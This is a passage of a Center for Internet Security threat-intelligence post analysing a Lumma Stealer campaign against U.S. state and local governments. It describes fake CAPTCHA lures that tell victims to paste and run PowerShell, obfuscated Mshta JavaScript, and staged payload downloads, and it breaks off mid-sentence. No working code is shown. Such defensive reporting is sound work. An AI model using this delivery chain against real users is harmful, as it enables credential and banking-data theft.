Home Insights Blog Posts Active Lumma Stealer Campaign Impacting U.S. SLTTs Active Lumma Stealer Campaign Impacting U.S. SLTTs By: The Center for Internet Security, Inc. (CIS®) Cyber Threat Intelligence (CTI) team Published March 20, 2025 The CIS CTI team identified Lumma Stealer malware activity impacting U.S. State, Local, Tribal, and Territorial (SLTT) government organizations. CIS analysts observed multiple detections through CIS Endpoint Security Services (ESS) where SLTT victims are redirected to malicious webpages delivering a fake CAPTCHA verification prompt designed to trick users into running a PowerShell script. CIS ESS detected these fake CAPTCHA verification prompts due to Mshta running malicious JavaScript as well as the attempted PowerShell script. (Mshta is a Windows utility used to execute Microsoft HTML applications (HTA) files.) Once the PowerShell script runs on the victim’s system, two additional PowerShell scripts are downloaded and run. A third PowerShell script containing a defense evasion technique and encrypted windows binary code is compiled on the infected system into the .NET Lumma Stealer payload. The CIS CTI team recommends that U.S. SLTT government entities remain aware of Lumma Stealer and other information stealer campaigns since they are widespread, opportunistic, and known to target sensitive data. Background Information on Lumma Stealer Lumma Stealer is an infostealer written in C that emerged on dark web forums in 2022. The cyber threat actors “Shamel,” also known as “Lumma,” sell Lumma Stealer as a Malware-as-a-Service (MaaS) subscription with various tiers. [1] Once cyber threat actors (CTAs) purchase Lumma Stealer, the malware enables them to target personally identifiable information (PII) on victims’ systems such as credentials and banking information. Depending on the tier CTAs purchase, the malware offers multiple defense evasion capabilities, including detecting virtualized environments, detecting user activity on the system, encrypting Lumma Stealer’s executable to deter reverse engineering, bypassing signature detection, and utilizing polygot files. [2] Lumma Stealer additionally employs a variety of techniques such as Living off the Land, specifically DLL sideloading, Mshta, PowerShell, process hollowing, SSH, and WMI. [3] Two Incidents with Fake CAPTCHA Verifications The current campaign uses malvertisement as an initial infection vector to deceive users into clicking malicious ads that lead to fake CAPTCHA verifications. CTAs use traffic distribution systems, content delivery networks, and compromised websites to spread malvertisements, which redirect end users to CTA-created webpages hosted on various providers. [4] , [5] After the victim clicks the “I’m not a robot” button in the fake CAPTCHA verification (Figure 1), they encounter unusual verification steps, which include: Press Windows button + R Press CTRL+V Press Enter Figure 1: Fake CAPTCHA verification steps. (Source: Qualys ) These steps execute a PowerShell command that leads to a Lumma Stealer download. The CIS CTI team analyzed two specific incidents associated with this activity based on CIS ESS detections, as described below. [6] Incident One In the first incident, the victim’s browser redirected to a fake CAPTCHA verification webpage housing obfuscated JavaScript as well as a Base64-encoded PowerShell script. CIS ESS detected the obfuscated JavaScript in the command line. Figure 2 shows the de-obfuscated script that ran in the command line. Figure 2: De-Obfuscated script that was run in the command line. After the victim completed the verification steps, the encoded PowerShell script ran on their machine. Figure 3 shows that the decoded PowerShell script was hidden and attempted to download a file. CIS ESS blocked this activity. If not blocked, the downloaded file would have run an obfuscated and encoded PowerShell script, downloading the final Lumma Stealer payload. Figure 3: Decoded PowerShell script is hidden and attempting to download a file. Incident Two Like in the first incident, the victim in second incident was redirected from a compromised or malicious webpage to a fake CAPTCHA verification page. CIS ESS once again detected the obfuscated JavaScript in the command line using Mshta. Figure 3 shows the de-obfuscated script. However, the PowerShell script had additional obfuscation including strings with additional Base64 encoding, as shown in Figure 4. Figure 4: Base64-Encoded PowerShell script. As shown in Figure 5, the decoded PowerShell script included substantial amounts of junk code, but the end of the decoded script contained a PowerShell script that similarly attempted to download a file. Despite looking like a database file, Handler.db was another encoded PowerShell script. Figure 5: Decoded PowerShell script. This encoded PowerShell script was heavily obfuscated; however, CIS analysts discovered a PowerShell command in the first half of the script that identified whether the